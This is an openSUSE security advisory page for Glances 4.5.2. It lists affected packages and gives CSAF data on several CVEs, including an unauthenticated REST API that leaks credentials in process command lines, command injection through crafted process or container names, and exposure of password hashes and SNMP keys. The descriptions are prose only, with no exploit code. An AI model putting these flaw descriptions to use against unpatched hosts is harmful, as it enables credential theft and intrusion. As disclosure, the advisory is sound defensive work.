|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
9.1 (Critical)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
critical
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
critical
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
26 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.2-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.2-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10415",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10415-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32596 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32596/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32609 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32609/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32610 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32610/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32632 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32632/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32633 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32633/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-32634 page",
"url": "https://www.suse.com/security/cve/CVE-2026-32634/"
}
],
"title": "glances-common-4.5.2-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-24T00:00:00Z",
"generator": {
"date": "2026-03-24T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10415-1",
"initial_release_date": "2026-03-24T00:00:00Z",
"revision_history": [
{
"date": "2026-03-24T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.aarch64",
"product": {
"name": "glances-common-4.5.2-1.1.aarch64",
"product_id": "glances-common-4.5.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.2-1.1.aarch64",
"product_id": "python311-Glances-4.5.2-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.2-1.1.aarch64",
"product_id": "python313-Glances-4.5.2-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.2-1.1.ppc64le",
"product_id": "glances-common-4.5.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.2-1.1.ppc64le",
"product_id": "python311-Glances-4.5.2-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.2-1.1.ppc64le",
"product_id": "python313-Glances-4.5.2-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.s390x",
"product": {
"name": "glances-common-4.5.2-1.1.s390x",
"product_id": "glances-common-4.5.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.2-1.1.s390x",
"product_id": "python311-Glances-4.5.2-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.2-1.1.s390x",
"product_id": "python313-Glances-4.5.2-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.2-1.1.x86_64",
"product": {
"name": "glances-common-4.5.2-1.1.x86_64",
"product_id": "glances-common-4.5.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.2-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.2-1.1.x86_64",
"product_id": "python311-Glances-4.5.2-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.2-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.2-1.1.x86_64",
"product_id": "python313-Glances-4.5.2-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64"
},
"product_reference": "glances-common-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x"
},
"product_reference": "glances-common-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64"
},
"product_reference": "glances-common-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.2-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.2-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.2-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-32596",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32596"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.2, Glances web server runs without authentication by default when started with `glances -w`, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32596",
"url": "https://www.suse.com/security/cve/CVE-2026-32596"
},
{
"category": "external",
"summary": "SUSE Bug 1260321 for CVE-2026-32596",
"url": "https://bugzilla.suse.com/1260321"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32596"
},
{
"cve": "CVE-2026-32608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The Glances action system allows administrators to configure shell commands that execute when monitoring thresholds are exceeded. These commands support Mustache template variables (e.g., `{{name}}`, `{{key}}`) that are populated with runtime monitoring data. The `secure_popen()` function, which executes these commands, implements its own pipe, redirect, and chain operator handling by splitting the command string before passing each segment to `subprocess.Popen(shell=False)`. Prior to 4.5.2, when a Mustache-rendered value (such as a process name, filesystem mount point, or container name) contains pipe, redirect, or chain metacharacters, the rendered command is split in unintended ways, allowing an attacker who controls a process name or container name to inject arbitrary commands. Version 4.5.2 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32608",
"url": "https://www.suse.com/security/cve/CVE-2026-32608"
},
{
"category": "external",
"summary": "SUSE Bug 1260320 for CVE-2026-32608",
"url": "https://bugzilla.suse.com/1260320"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-32608"
},
{
"cve": "CVE-2026-32609",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-32609"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. The GHSA-gh4x fix (commit 5d3de60) addressed unauthenticated configuration secrets exposure on the `/api/v4/config` endpoints by introducing `as_dict_secure()` redaction. However, the `/api/v4/args` and `/api/v4/args/{item}` endpoints were not addressed by this fix. These endpoints return the complete command-line arguments namespace via `vars(self.args)`, which includes the password hash (salt + pbkdf2_hmac), SNMP community strings, SNMP authentication keys, and the configuration file path. When Glances runs without `--password` (the default), these endpoints are accessible without any authentication. Version 4.5.2 provides a more complete fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-32609",
"url": "https://www.suse.com/security/cve/CVE-2026-32609"
},
{
"category": "external",
"summary": "SUSE Bug 1259832 for CVE-2026-32609",
"url": "https://bugzilla.suse.com/1259832"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le",
